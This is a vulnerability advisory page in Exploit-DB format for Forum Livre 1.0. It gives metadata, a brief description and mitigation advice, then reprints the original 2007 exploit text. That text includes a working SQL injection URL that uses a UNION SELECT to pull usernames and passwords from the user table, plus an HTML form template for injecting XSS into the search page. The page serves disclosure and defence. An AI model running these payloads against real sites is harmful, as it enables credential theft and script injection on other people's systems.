Forum Livre 1.0 Multiple Remote Vulnerabilities

vendor:

Forum Livre

by:

ajann

7.5

CVSS

HIGH

Multiple Remote Vulnerabilities

89 (SQL Injection), 79 (XSS)

CWE

Product Name: Forum Livre

Affected Version From: Forum Livre 1.0

Affected Version To: Forum Livre 1.0

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Forum Livre 1.0 Multiple Remote Vulnerabilities

The Forum Livre 1.0 application is vulnerable to SQL injection and cross-site scripting (XSS) attacks. The SQL injection vulnerability can be exploited by modifying the 'user' parameter in the 'info_user.asp' page. The XSS vulnerability can be exploited by injecting malicious code into the 'palavra' parameter in the 'busca2.asp' page.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input validation and sanitization techniques. Additionally, applying security patches and updates provided by the vendor can help prevent exploitation.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  Forum Livre 1.0 Multiple Remote Vulnerabilities
# Author  :  ajann
# Contact :  :(
# $$      :  Free

*******************************************************************************

[[SQL]]]---------------------------------------------------------

Login Before..->

http://[target]/[path]//info_user.asp?user=[SQL]

Example:

//info_user.asp?user=-1'union%20select%200,0,0,loginu,senhau,0,0,0,0,0,0%20from%20tusuario

[[/SQL]]

[[XSS]]]---------------------------------------------------------

Login Before..->

http://[target]/[path]//busca2.asp (POST Method) [SQL]

Example:

<form method="POST" action="http://[TARGET]/[path]/busca2.asp">
<input type="text" name="palavra" value="[#]XSS HERE[#]">
<input type="radio" value="all" name="tipo" checked>
<input type="radio" value="some" name="tipo">
<select size="1" name="forum">
<option value="">Todos os fóruns</option>
<option value="">Fórum ComCatz</option>
<input type="submit" value="Investigar" name="B1">
</form>

[[/XSS]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-25]